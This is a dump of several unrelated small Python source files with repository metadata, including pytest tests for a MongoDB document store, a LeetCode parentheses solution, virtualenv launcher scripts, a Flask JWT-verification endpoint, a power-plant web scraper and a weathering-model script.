for file in os.listdir(this_dir):
_idx = "{:0>4d}".format(cnt)
name = _id + '_' + _idx + '.jpg'
cnt += 1
src = os.path.join(this_dir, file)
dst = os.path.join(this_dir, name)
os.rename(src, dst)
print("All done.")
| [
"nanhangdingyang@163.com"
] | nanhangdingyang@163.com |
9a3dff4505416c7621031482886acde695f4199e | bb00a3876ddb49dcea2cdc4bbd2356359260a563 | /poptimizer/evolve/tests/test_store.py | d20ee06f325caec712a7a86b4cc74674f8863523 | [
"Unlicense"
] | permissive | hraffiest/poptimizer | 1d2975acd0ecbe8466a7a1aa1bf631d12b4c9854 | 16bc9e056a6daa452d48cdac0dea5901e4a3d4a1 | refs/heads/master | 2023-04-21T02:29:06.259420 | 2021-05-05T14:33:03 | 2021-05-05T14:33:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,176 | py | from types import SimpleNamespace
import bson
import pymongo
import pytest
from poptimizer.evolve import store
@pytest.fixture(scope="module", autouse=True)
def set_test_collection():
# noinspection PyProtectedMember
saved_collection = store._COLLECTION
test_collection = saved_collection.database["test"]
store._COLLECTION = test_collection
yield
store._COLLECTION = saved_collection
test_collection.drop()
def test_get_collection():
collection = store.get_collection()
assert isinstance(collection, pymongo.collection.Collection)
assert collection.name == "test"
@pytest.fixture(scope="class", name="field_instance")
def make_field_and_instance():
field = store.BaseField()
instance = SimpleNamespace()
instance._update = {}
return field, instance
class TestBaseField:
def test_set_name_index(self):
field = store.BaseField(index=True)
field.__set_name__(SimpleNamespace, "some")
assert field._name == store.ID
def test_set_name(self, field_instance):
field, _ = field_instance
field.__set_name__(SimpleNamespace, "some")
assert field._name == "some"
def test_get_raise(self, field_instance):
field, instance = field_instance
with pytest.raises(AttributeError) as error:
field.__get__(instance, SimpleNamespace)
assert "'SimpleNamespace' object has no attribute 'some'" in str(error.value)
def test_set(self, field_instance):
field, instance = field_instance
field.__set__(instance, 42)
assert hasattr(instance, "some")
assert instance.some == 42
assert len(instance._update) == 1
assert instance._update["some"] == 42
def test_get(self, field_instance):
field, instance = field_instance
assert field.__get__(instance, SimpleNamespace) == 42
@pytest.fixture(scope="class", name="default_field_instance")
def make_default_field_and_instance():
field = store.DefaultField(53)
field.__set_name__(SimpleNamespace, "some")
instance = SimpleNamespace()
instance._update = {}
return field, instance
class TestDefaultField:
def test_unset_get(self, default_field_instance):
field, instance = default_field_instance
assert field.__get__(instance, SimpleNamespace) == 53
def test_set_get(self, default_field_instance):
field, instance = default_field_instance
field.__set__(instance, 64)
assert field.__get__(instance, SimpleNamespace) == 64
@pytest.fixture(scope="class", name="genotype_field_instance")
def make_genotype_field_and_instance():
field = store.GenotypeField()
field.__set_name__(SimpleNamespace, "some")
instance = SimpleNamespace()
instance._update = {}
return field, instance
class TestGenotypeField:
def test_set_not_genotype(self, genotype_field_instance):
field, instance = genotype_field_instance
field.__set__(instance, None)
rez = field.__get__(instance, SimpleNamespace)
assert isinstance(rez, store.Genotype)
assert isinstance(instance.some, store.Genotype)
assert rez is instance.some
def test_set_genotype(self, genotype_field_instance):
field, instance = genotype_field_instance
genotype = store.Genotype(None)
field.__set__(instance, genotype)
assert genotype is field.__get__(instance, SimpleNamespace)
assert genotype is instance.some
class TestDoc:
def test_new_doc_and_save(self):
assert store.get_collection().count_documents({}) == 0
genotype = store.Genotype()
doc = store.Doc(genotype=genotype)
assert store.get_collection().count_documents({}) == 0
assert len(doc._update) == 2
assert isinstance(doc.id, bson.ObjectId)
assert doc.genotype is genotype
assert doc.wins == 0
assert doc.model is None
with pytest.raises(AttributeError) as error:
isinstance(doc.llh, bson.ObjectId)
assert "object has no attribute 'llh'" in str(error.value)
assert doc.date is None
assert doc.timer == 0
assert doc.tickers is None
doc.save()
assert store.get_collection().count_documents({}) == 1
assert len(doc._update) == 0
def test_load_wrong_doc(self):
id_ = bson.ObjectId()
with pytest.raises(store.IdError) as error:
store.Doc(id_=id_)
assert str(id_) in str(error.value)
def test_load_doc(self):
db_doc = store.get_collection().find_one()
doc = store.Doc(id_=db_doc[store.ID])
assert len(doc._update) == 0
assert doc.id == db_doc[store.ID]
assert doc.genotype == db_doc["genotype"]
assert doc.wins == 0
assert doc.model is None
with pytest.raises(AttributeError) as error:
isinstance(doc.llh, bson.ObjectId)
assert "object has no attribute 'llh'" in str(error.value)
assert doc.date is None
assert doc.timer == 0
assert doc.tickers is None
def test_load_doc_update_and_save(self):
db_doc = store.get_collection().find_one()
doc = store.Doc(id_=db_doc[store.ID])
assert len(doc._update) == 0
doc.wins = 42
doc.llh = 2.2
doc.timer = 111
assert len(doc._update) == 3
doc.save()
assert len(doc._update) == 0
doc_loaded = store.Doc(id_=db_doc[store.ID])
assert len(doc_loaded._update) == 0
assert doc_loaded.id == db_doc[store.ID]
assert doc_loaded.genotype == db_doc["genotype"]
assert doc_loaded.wins == 42
assert doc_loaded.model is None
assert doc_loaded.llh == 2.2
assert doc_loaded.date is None
assert doc_loaded.timer == 111
assert doc_loaded.tickers is None
def test_delete(self):
assert store.get_collection().count_documents({}) == 1
db_doc = store.get_collection().find_one()
doc = store.Doc(id_=db_doc[store.ID])
doc.delete()
assert store.get_collection().count_documents({}) == 0
| [
"wlmike@gmail.com"
] | wlmike@gmail.com |
df1d21328fc7d36db4f0332cde27f441b36065d9 | 69198c187d7d3be82164acb1fa4dd5bad8b14a1f | /src/Lesson_100/lesson_08.py | 99bd3adceae62d18fb67a2448cd7bc334bd3bee3 | [] | no_license | dahai33/my_python | 64067633f99369fdffa680afff185f2fb579e4c8 | 56a49b79c61fce828225971a8e2855a95540f954 | refs/heads/master | 2020-03-21T09:11:46.640149 | 2018-08-06T16:29:55 | 2018-08-06T16:29:55 | 138,387,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,084 | py | # #!/usr/bin/python3
# #Author:刘海涛
# # --*-- coding: uft-8 --*--
# # @Time : 19:32
# #@字符串正则表达
# #字符串格式
# str="version3.0"
# # num=1.0
# # # sum =100
# # # format="%s" % str1
# # # #format="%s,%.4f,%%" %(str1,num,sum)
# # # format="%,%" % sum
# # # print(format)
# # print(str.center(20))
# # print(str.center(20,"*"))
# # print(str.rjust(30))
# # print(str.ljust(5))
# # print("%50s" % str)
# #字符串的转换
# path="liu\hai\tao\da\hai"
# # print(path)
# # print(len(path))
# # path=r"hellow\word\a"
# # print(path)
# # print(len(path))
# #去掉字符串中的转移符 strip() lstrip() rstip()
# # print(path)
# # print(path.strip())
# # print(path.lstrip())
# # print(path.rstrip())
# # 字符串的合并
# # str="liuhaitao"
# # str1="nice"
# # str2="good"
# # print(str + "%5s" % str1 + "%5s" % str2)
# # Strs=["hello","word","china"]
# # result="".join(Strs)
# # print(result)
# # from functools import reduce
# # import operator
# # re=reduce(operator.add,result,"")
# # print(re)
# # print(str[3:9])
# # st="bad nic: 1,2 3,5"
# # print(st.split())
# # print(st.split(","))
# # print(st.split(",",2))
# # s="a"
# # print(id(s))
# # print(id(s+"b"))
# ##字符串的比较 == !=
# # str="abc"
# # str1="abc"
# # str2="ABC"
# # if(str != str2):
# # print("nice")
# # else:
# # print("bad")
# #字符串的翻转
# # def reverse(s):
# # out=""
# # li=list(s)
# # for i in range(len(li),0,-1):
# # out +="".join(li[i-1])
# # return out
# # print(reverse("abcdsef"))
# #字符串的替换
# # str="this is a apple."
# # #头部开始查找
# # print(str.find("a"))
# # #尾部开始查找
# # print(str.rfind("a"))
# # #字符串的替换
# # str1="hello liu hai hello liu"
# # print(str1.replace("hello","nice",4))
# # print(str1.replace("liu","tao"))
# ##字符串和日期的转换
# # import time, datetime
# # print(time.strftime("%Y-%m-%d %X",time.localtime()))
# # print(time.localtime())
# #字符串的正则表达尺
# import re
"http://test-cookbook.readthedocs.io/en/latest/AndroidTest/index.html" | [
"liuhaitaodahai@sina.com"
] | liuhaitaodahai@sina.com |
e6087a9c1c28e76a6ddda6878925fca52382f776 | 36b2c96a233fad7bbe7ee2278567dc83e31cfa3e | /20.有效的括号.py | 4bf27fd3b85a12dee7db8c3fc4a78d92757afc2a | [] | no_license | CN-COTER/leetcode | 60f17274d876c7743c0eff299d0b8d045b79f336 | 3c1253daa4e85a68cb9ee341ea6cbe3708e31790 | refs/heads/master | 2023-01-19T20:32:18.087503 | 2020-12-01T09:11:57 | 2020-12-01T09:11:57 | 275,530,085 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 625 | py | #
# @lc app=leetcode.cn id=20 lang=python3
#
# [20] 有效的括号
#
# @lc code=start
class Solution:
def isValid(self, s: str) -> bool:
stack = []
d = {'}':'{', ')':'(', ']':'['}
a = set(['(', '[', '{'])
for char in s:
if char in a:
stack.append(char)
else:
if stack:
c = stack.pop()
if c != d[char]:
return False
else:
return False
if stack:
return False
else:
return True
# @lc code=end
| [
"23699812+CN-COTER@users.noreply.github.com"
] | 23699812+CN-COTER@users.noreply.github.com |
0b3505f9997bf768ce97908ccef48d6cda641172 | a5d849f9d9daf2aaa85604ee5d45ccb6577e8127 | /flask_app/.env/bin/wheel | 3e570b1acc4af88d7b8bbf70ed34774777d16340 | [] | no_license | thecuongthehieu/Non-contact-Infrared-Thermometers-Project | 48ca3061a9c30a904441d293296723f760324b50 | aaa342e86f2bb3747593511afc4120c3dd48a42b | refs/heads/master | 2022-09-01T18:25:29.188304 | 2020-05-25T02:42:53 | 2020-05-25T02:42:53 | 263,975,556 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 247 | #!/home/thecuong/Desktop/SE/flask_app/.env/bin/python2
# -*- coding: utf-8 -*-
import re
import sys
from wheel.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"thecuongthehieu@gmail.com"
] | thecuongthehieu@gmail.com | |
ee7a30ed534036c38ac71e4aa8e959f2c127a862 | 251651b763c2588a0a6b65d8b23d93b195a91788 | /virtual/bin/gunicorn | 0b628ba141f066067c63f04acb73acfb5b4b36dc | [
"MIT"
] | permissive | AugustineOchieng/studio | b0f6feb14f7f3e1f65644bffbee9d2c3fe805c8f | ee7fb55fd2ad7046414a68872af98361719af42b | refs/heads/master | 2020-05-21T08:21:07.033975 | 2019-05-15T10:14:45 | 2019-05-15T10:14:45 | 185,977,336 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | #!/home/moringa/Desktop/studio/virtual/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from gunicorn.app.wsgiapp import run
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(run())
| [
"gusochieng@gmail.com"
] | gusochieng@gmail.com | |
70f629353a7de8b8fc4f753cff027ec7c15d8119 | c48e922b4ddd14a19d152ae1aff0aa276ed3fe0d | /cmp_cover_radio.py | d9235ff259620698576ae922b22ecae5cb3a1679 | [] | no_license | qbetter/normal_python_tool | 3623f973d25b290ae8bce73e807cdece793f7d51 | 1678116d4490bd887d3f8572a9e9c0ba67d0dec0 | refs/heads/master | 2021-07-14T00:52:06.323537 | 2020-06-24T06:26:38 | 2020-06-24T06:26:38 | 175,729,729 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,082 | py | #!/usr/bin/env python
#-*-coding:utf-8
import re
import os
import json
import time
import sys
reload(sys)
sys.setdefaultencoding('utf8')
def cmp_cover(merge_hot_file,uid_file):
uid_dict = dict()
#merge_file = "./../data/merge_hot_data"
with open(uid_file,'r') as pub:
for line in pub.readlines():
line = line.strip()
uid_dict[line] = 1
with open(merge_hot_file,'r') as fd:
num = 0
#merge_hot_len = 0
for line in fd.readlines():
line = line.strip()
uid = line.split("\t")[0]
if uid in uid_dict:
num = num + 1
#merge_hot_len = merge_hot_len + 1
print("hit number is ",num)
cover = float(num)/len(uid_dict)
print("cover radio is ",cover)
if __name__ == "__main__":
# 去除推荐词中的同义词
merge_hot_file = "./have_age_uniq_uid"
#merge_hot_file ="./../data/user_30day_buy_query_20190702_uid"
#merge_hot_file ="./individual_hotword_file_uid"
uid_file = "./uid_0614"
cmp_cover(merge_hot_file,uid_file)
| [
"noreply@github.com"
] | qbetter.noreply@github.com |
6da4f31b24602a102458b063416568092a2a669e | dfda53a0563863953c3b6d84c4aea7e7a011eba8 | /死循环.py | 70a760f372781b29b1411256942ec0b27d87925a | [] | no_license | 1161976978/print | faeab2226173d4a3ea52ab631265792a5ff3a838 | edb9be4c1ca3af3cdf88c247ca4453124e0cf7d5 | refs/heads/main | 2023-03-21T01:16:52.839300 | 2021-03-19T14:39:51 | 2021-03-19T14:39:51 | 349,292,481 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68 | py | while True :
print('我爱你')
# CTAL+C 停止运行代码 | [
"77332743+15766320725@users.noreply.github.com"
] | 77332743+15766320725@users.noreply.github.com |
3f86754056689d08a519f2a79797332c97fa1366 | fcb94b0575d55b246a4e78dfec2610c9aceb836e | /tests/test_code/py/import_paths/abra.py | 046a90a0eb69f363cdbdc9eb6c947ebc79278f71 | [
"LGPL-2.0-or-later",
"MIT"
] | permissive | sarvex/code2flow | 1504fb0537ea17f486013e67958b4e17551f3a02 | 77375b90a09abd4b4d38167737d02ff4737a52aa | refs/heads/main | 2023-06-10T03:24:18.935595 | 2023-05-30T23:52:11 | 2023-05-30T23:52:11 | 33,498,323 | 0 | 0 | MIT | 2023-05-30T23:52:12 | 2015-04-06T18:33:55 | Python | UTF-8 | Python | false | false | 19 | py | def abra2():
pass
| [
"noreply@github.com"
] | sarvex.noreply@github.com |
db24784d0aab247ff173aa26481150febc78e352 | e3602f36cec6581098c6786d5dc9bda3cb914072 | /IntroductionWork/Graham.py | 291098492b7558a2291011eb13aae3f8dfe02aca | [] | no_license | dadi0/richang | c0821eaab89e85e113f36a8e25525f86d7e5fd6b | c63171ecfd390135b2079bbbd4876e8c63fbdd2c | refs/heads/master | 2020-04-02T08:35:35.279523 | 2020-02-26T08:07:19 | 2020-02-26T08:07:19 | 154,251,197 | 0 | 0 | null | 2019-02-08T05:27:02 | 2018-10-23T02:45:52 | null | UTF-8 | Python | false | false | 1,870 | py | import math
from operator import *
def area(ans_list):#以选出正确点且按包围顺序排好
s1 = ans_list[:2]
del ans_list[0:2]
s = 0
for i in ans_list:
x1 = s1[1][0] - s1[0][0]
y1 = s1[1][1] - s1[0][1]
x2 = i[0] - s1[0][0]
y2 = i[1] - s1[0][1]
s += x1 * y2 - x2 * y1
s1.pop()
s1.append(i)
s = s / 2
return s
def convex_hull(point_list):#已经排好序
if len(point_list) < 3:
return -1
end_point = point_list[:2]
del point_list[:2]
for i in point_list:
x1 = end_point[-1][0] - end_point[-2][0]
y1 = end_point[-1][1] - end_point[-2][1]
x2 = i[0] - end_point[-2][0]
y2 = i[1] - end_point[-2][1]
tag = x1 * y2 - x2 * y1
while tag <= 0:
end_point.pop()
x1 = end_point[-1][0] - end_point[-2][0]
y1 = end_point[-1][1] - end_point[-2][1]
x2 = i[0] - end_point[-2][0]
y2 = i[1] - end_point[-2][1]
tag = x1 * y2 - x2 * y1
end_point.append(i)
return area(end_point)
def psort(enter_list):
enter_list.sort(key=itemgetter(1, 0))
point = enter_list[0]
tag1 = []
for i in range(1, len(enter_list)):
lengthc = math.sqrt((enter_list[i][0]-point[0])**2+(enter_list[i][1]-point[1])**2)
if lengthc == 0:
continue
else:
cos = (enter_list[i][0]-point[0])/lengthc
tag1.append((i, -cos))
tag1.sort(key=itemgetter(1))
tag2 = []
for i in range(len(tag1)-1):
if tag1[i][1] != tag1[i+1][1]:
tag2.append(tag1[i])
tag2.append(tag1[-1])
tag3 = [0]
for i in range(len(tag2)):
tag3.append(tag2[i][0])
enter_list_sort = []
for i in tag3:
enter_list_sort.append(enter_list[i])
return convex_hull(enter_list_sort)
| [
"44309668+dadi0@users.noreply.github.com"
] | 44309668+dadi0@users.noreply.github.com |
dcfb5ee9a48a74fb1f965e8cfc06719b83f04176 | 74dc27851303d24291c39a127e5575de24cec0b1 | /venv/bin/easy_install | 7c136c9aaae7569bb0767e5d4e38cce03d7bb5af | [] | no_license | lxherman/OtaPipDemo | 56d568919d94cab6e238a05e92a7337837cfb366 | ec614544532b2edec0f56fcf91f95909139d6b8a | refs/heads/master | 2023-06-23T05:09:23.401904 | 2021-07-22T03:57:22 | 2021-07-22T03:57:22 | 388,319,901 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 438 | #!/Users/macmini/Desktop/otavio_demo/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
)
| [
"549622112@qq.com"
] | 549622112@qq.com | |
0c5d88473d4b5a6f23e8fb96f0e7bae6969ca868 | 5f9ca0fa06eb34965c7fe57d7e54adb9827694fd | /jwt/decode-jwt/app.py | 0772cc6c27a6b08cc6ed4eb1b5c2161bc76be518 | [
"Python-2.0",
"MIT"
] | permissive | OlgaMacko/vonage-python-code-snippets | b7d6037f1b47338731fec3fb37792dc8497f8bbb | 78eeaa256d0c11e23f05f72c3b2ab90bcbb6083c | refs/heads/master | 2023-06-25T04:20:03.962951 | 2021-07-07T14:34:54 | 2021-07-07T14:34:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 604 | py | import os
from flask import Flask, request
import jwt
VONAGE_API_KEY = os.getenv("VONAGE_API_KEY")
VONAGE_SIGNATURE_SECRET = os.getenv("VONAGE_SIGNATURE_SECRET")
VONAGE_SIGNATURE_SECRET_METHOD = os.getenv("VONAGE_SIGNATURE_SECRET_METHOD")
app = Flask(__name__)
@app.route("/", methods=['GET', 'POST'])
def callback():
token = request.headers.get("Authorization")[7:]
try:
jwt.decode(token, VONAGE_SIGNATURE_SECRET, 'HS256')
print("Signature was validated")
except:
print("Unable to validate signature")
return '', 200
if __name__ == "__main__":
app.run()
| [
"noreply@github.com"
] | OlgaMacko.noreply@github.com |
26b79b5f01eb9407b5cfed52526a34290b7604b2 | 3458958257e5cc5ec67ebac36b5d2e1523793f6b | /scrape_site.py | bed7af40d7b803e95367d053ec002b645b4e604f | [] | no_license | Tooblippe/power_scrape | 4af5a9a7f13164800df2d9cdd675d9b758787596 | f0355ebf2e3c81585bf54d61a1b8767a0aa17f99 | refs/heads/master | 2020-05-17T06:37:19.713585 | 2014-10-29T16:43:08 | 2014-10-29T16:43:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,749 | py | # -*- coding: utf-8 -*-
"""
Code to scrape website contents
Created on Wed Oct 22 19:36:30 2014
@author: tobie
"""
import pandas as pd
import requests
from lxml import html
#empty container to save website in
data = pd.DataFrame()
#empty list for temp use
el = []
base_url = 'http://globalenergyobservatory.org/'
scrape_url = 'http://globalenergyobservatory.org/list.php?db=PowerPlants&type=Coal'
#read all the links to dataframe data
#-------------------------------------
page = requests.get(scrape_url)
dom = html.fromstring(page.text)
for link in dom.xpath('//a/@href'): # select the url in href for all a tags(links)
if 'geoid' in link:
print "found url: ",base_url+link
el.append(base_url+link)
data['url'] = el
#transverse all pages and save complete page to dataframe
#we should do this in parralel using map
#puts everything in a dataframe...not sure this is good iea
#idea was to pickle the dataframe...but did not work
#----------------------------------------------------------
el = []
for i, station_url in enumerate(data['url']):
print station_url,
page = requests.get(station_url)
dom = html.fromstring(page.text)
print 1428-i, 'to go'
el.append(dom)
data['dom'] = el
#parse dom to find info
#uses xpath to get some info
#-scrape from DOM
data['description'] = data['dom'].apply(lambda x : x.xpath('//*[@class="wrapper"]/form[1]/div[1]/table[2]/tr/td/text()')[0])
data['name'] = data['dom'].apply(lambda x : x.xpath('//*[@id="Name"]/@value')[0])
data['boiler'] = data['dom'].apply(lambda x : x.xpath(' //*[@id="Boiler_Manufacturer_1"]/@value')[0])
#scrape from description tag using pythons text functions
#offsets hard coded. not a good idea should format change
data['units'] = data['description'].apply( lambda a : a[a.find('It has') + 7: a.find('It has')+9].rstrip() )
data['plant_type'] = data['description'].apply( lambda a : a[a.find('TYPE') + 5: a.find('with')].rstrip())
data['capacity'] = data['description'].apply( lambda a : a[a.find('capacity of') + 12:a.find('MWe')].rstrip())
data['operated_by'] = data['description'].apply( lambda a : a[a.find('operated by') + 12 :-1].rstrip() )
#prepare xls writeout
#------------------------
writeout = pd.DataFrame()
writeout['name'] = data['name']
writeout['description'] = data['description']
writeout['plant_type'] = data['plant_type']
writeout['capacity'] = data['capacity']
writeout['units'] = data['units']
writeout['boiler'] = data['boiler']
writeout['operated_by'] = data['operated_by']
writeout['url'] = data['url']
# write out to excel -- the needed format
# you can use .to_csv() to be more portable
writeout.to_excel('power_scrape.xls') | [
"tobie.nortje@gmail.com"
] | tobie.nortje@gmail.com |
0b9ddd370422b538b290ced7dd9b1346a382c886 | 79e75f2a7ff1f14ee542210c5103568cef86049e | /filters/__init__.py | 9fc6eba5dff3c579d249a8ed61d8106b807f9c39 | [] | no_license | CYBEX-P/cybexp-analytics | b72e6b7302cb8dfdd400f699df2c5ea0d9f6b3f9 | 6542ec5bc37d7e7231a1e9d4a89fd4ffc1fa1382 | refs/heads/master | 2023-06-28T07:13:31.688927 | 2021-07-27T18:26:01 | 2021-07-27T18:26:01 | 300,465,518 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | from .common import set_filter_backend
from .cowrie import Cowrie
from .email import Email
from .openphish_feed import OpenPhishFeed
from .phishtank_feed import PhishTankFeed
from .sighting import Sighting
| [
"qclass@tutanota.com"
] | qclass@tutanota.com |
d5449150858c090ac9d6e21f3e003f0c65724c14 | c46020c71162f8843fe3f3d69d4e1b9a340a42f8 | /blogging/models.py | 9920f97ab368f6773d2dbc68985d90c52c118dcc | [] | no_license | davidbUW/django-blog | 2f99dc06d199f997c46b0d68660bf9b2c6277197 | d94a26435518ff4564d75ec1723cf29fb2bfddcf | refs/heads/master | 2023-01-30T15:53:13.442712 | 2020-11-25T01:30:27 | 2020-11-25T01:30:27 | 308,798,281 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 825 | py | from django.db import models # <-- This is already in the file
from django.contrib.auth.models import User
class Post(models.Model):
title = models.CharField(max_length=128)
text = models.TextField(blank=True)
author = models.ForeignKey(User, on_delete=models.CASCADE)
created_date = models.DateTimeField(auto_now_add=True)
modified_date = models.DateTimeField(auto_now=True)
published_date = models.DateTimeField(blank=True, null=True)
def __str__(self):
return self.title
class Category(models.Model):
name = models.CharField(max_length=128)
description = models.TextField(blank=True)
posts = models.ManyToManyField(Post, blank=True, related_name='categories')
def __str__(self):
return self.name
class Meta:
verbose_name_plural = 'Categories' | [
"dburnett2003@gmail.com"
] | dburnett2003@gmail.com |
6aa6276f3e070f43a2aa3ca62e6af7bdb4fe40ca | cac7c5aeb9e85898213c0eaa0b589793d8dafa03 | /variablePractice.py | 0e4cc6026887aacfd7f06effae43c5470a62f341 | [] | no_license | ccaguirre/variablePractice | d70d072f3648df991b0a56bcb6e9a63f4e74f7dd | e0f25e62be20fa0a2e3f497f5276e4f3e6bc6db1 | refs/heads/master | 2020-09-22T15:10:02.120168 | 2019-12-02T00:55:50 | 2019-12-02T00:55:50 | 225,253,711 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 782 | py | '''
Created on Dec 1, 2019
@author: ITAUser
'''
var1 = 5
print(var1)
var2 = 10
print(var2)
var3 = var2
print(var3)
x = 24
print(x)
y = 100
print (y)
z = 1.1
print(z)
a = 2.75
print(a)
b = a
print(b)
c = 100.1
print(c)
d = 12.3
print(d)
name = "Caleb"
print(name)
e = "c"
print(e)
f = "e"
print(f)
g = "chicken"
print(g)
h = "cal"
print(h)
done=False
print(done)
smart = True
print(smart)
i = done
print(done)
j = False
print(j)
almostdone=True
print(almostdone)
list_int = [x,y,var1, var2,var3]
print(list_int.index(var1))
listString = [name,e,f,g,h]
print(listString.index(g))
listBoolean=[done,smart,i,j,almostdone]
print(listBoolean.index(done))
print(listBoolean.index(smart))
print(listBoolean.index(i))
print(listBoolean.index(j))
print(listBoolean.index(almostdone))
| [
"57292005+ccaguirre@users.noreply.github.com"
] | 57292005+ccaguirre@users.noreply.github.com |
8e076c6a3aa7960896001bd7acb4c650eb3e0ddf | b029b9ddbe7bbc2d7f82bbbfbfdcb71472bbf10c | /peepingtom/utils/tests/test_geometric_primitives.py | 3d237f42828b8908786842d9f4387080aca8d9a3 | [] | no_license | alisterburt/peepingtom | 48a74c80b14d5e4cf20ac9229268971eb858cd44 | 1e6084b2c25a9c54d0296c463c6e78e57245f0c3 | refs/heads/master | 2023-03-14T23:31:44.697388 | 2020-11-09T23:01:48 | 2020-11-09T23:01:48 | 310,046,036 | 0 | 0 | null | 2020-12-15T15:59:31 | 2020-11-04T15:41:56 | Python | UTF-8 | Python | false | false | 3,451 | py | import numpy as np
from numpy.testing import assert_almost_equal, assert_array_equal
from ..geometric_primitives import Point2D, Points2D, Point3D, Points3D
def test_point2d():
data = [1, 2]
# test instantiation
p = Point2D(data)
assert isinstance(p, Point2D)
# check dimensionality and shape
assert p.ndim == 1
assert p.shape == (2,)
# check has parent attribute from Child class
assert hasattr(p, 'parent')
# check has attributes 'x' and 'y'
assert hasattr(p, 'x')
assert hasattr(p, 'y')
# check attributes 'x' and 'y' are correct
assert p.x == 1
assert p.y == 2
# check reshaping is working as expected
data = [[1, 2]]
p = Point2D(data)
assert p.shape == (2,)
# check that distance_to method works
distance = Point2D([0, 0]).distance_to_point([1, 1])
assert_almost_equal(np.sqrt(2), distance, decimal=7)
# check center of mass
assert_array_equal(p.center_of_mass, p)
assert p.center_of_mass.ndim == 1
def test_points2d():
data = np.arange(4).reshape(2, 2)
# test instantiation
p = Points2D(data)
assert isinstance(p, Points2D)
# check dimensionality and shape
assert p.ndim == 2
assert p.shape == (2, 2)
# check center of mass
assert_array_equal(p.center_of_mass, [1, 2])
# check distance to
assert_almost_equal(p.distance_to_point([1, 2]), 0)
# check has attributes
assert hasattr(p, 'x')
assert hasattr(p, 'y')
assert_array_equal(p.x, [0, 2])
assert_array_equal(p.y, [1, 3])
assert hasattr(p, 'parent')
# check reshaping works correctly
data = np.arange(2)
p = Points2D(data)
assert p.ndim == 2
assert p.shape == (1, 2)
def test_point3d():
data = [1, 2, 3]
# test instantiation
p = Point3D(data)
assert isinstance(p, Point3D)
# check dimensionality and shape
assert p.ndim == 1
assert p.shape == (3,)
# check has parent attribute from Child class
assert hasattr(p, 'parent')
# check has attributes 'x', 'y' and 'z'
assert hasattr(p, 'x')
assert hasattr(p, 'y')
assert hasattr(p, 'z')
# check attributes 'x' and 'y' are correct
assert p.x == 1
assert p.y == 2
assert p.z == 3
# check reshaping is working as expected
data = [[1, 2, 3]]
p = Point3D(data)
assert p.shape == (3,)
# check that distance_to method works
distance = Point3D([0, 0, 0]).distance_to_point([1, 1, 1])
assert_almost_equal(np.sqrt(3), distance, decimal=7)
# check center of mass
assert_array_equal(p.center_of_mass, p)
assert p.center_of_mass.ndim == 1
def test_points3d():
data = np.arange(9).reshape(3, 3)
# test instantiation
p = Points3D(data)
assert isinstance(p, Points3D)
# check dimensionality and shape
assert p.ndim == 2
assert p.shape == (3, 3)
# check center of mass
assert_array_equal(p.center_of_mass, [3, 4, 5])
# check distance to
assert_almost_equal(p.distance_to_point([3, 4, 5]), 0)
# check has attributes
assert hasattr(p, 'x')
assert hasattr(p, 'y')
assert hasattr(p, 'z')
assert_array_equal(p.x, [0, 3, 6])
assert_array_equal(p.y, [1, 4, 7])
assert_array_equal(p.z, [2, 5, 8])
assert hasattr(p, 'parent')
# check reshaping works correctly
data = np.arange(3)
p = Points3D(data)
assert p.ndim == 2
assert p.shape == (1, 3) | [
"alisterburt@gmail.com"
] | alisterburt@gmail.com |
92a9af4316d702f9f9fdb0850571ca25bca0aeac | c5c042694dd532682eb0a8a99e1382e66bdb18df | /models/Round4-/Xo-max_Yo-min_V-min_L-max_t-min.py | b69d3052384658d50eb4c972a99e2a8759b7ec23 | [
"MIT"
] | permissive | gehilley/NondimensionalWeathering | 63cafda88fa50c69d97153007c275a713a5127f7 | 5b1611780f0e1f8a579dadce4ee7725f71b0f718 | refs/heads/master | 2022-09-26T05:41:33.894944 | 2022-09-06T12:42:15 | 2022-09-06T12:42:15 | 232,174,788 | 0 | 0 | MIT | 2020-03-01T23:53:20 | 2020-01-06T19:56:21 | Python | UTF-8 | Python | false | false | 603 | py | filename = 'models/Xo-max_Yo-min_V-min_L-max_t-min.p'
from weathering_model.weathering_model import run_weathering_model
import numpy as np
import pickle as p
# Run model:
L_star = 1900
X0_star = 10.4
Y0_star = 0.000171
v_star = 0.255
nx = 101
t_star = np.array([0, 0.000017, 0.000035, 0.000052, 0.000070, 0.000087, 0.000104, 0.000122, 0.000139, 0.000157, 0.000174])
dx_star = L_star / float(nx)
x, X, Y = run_weathering_model(L_star, X0_star, v_star, Y0_star, t_star, dxstar=dx_star, method = 'DOP853')
p.dump((x, X, Y, L_star, X0_star, Y0_star, v_star, nx, t_star, dx_star), open(filename, 'wb'))
| [
"gehilley@gmail.com"
] | gehilley@gmail.com |
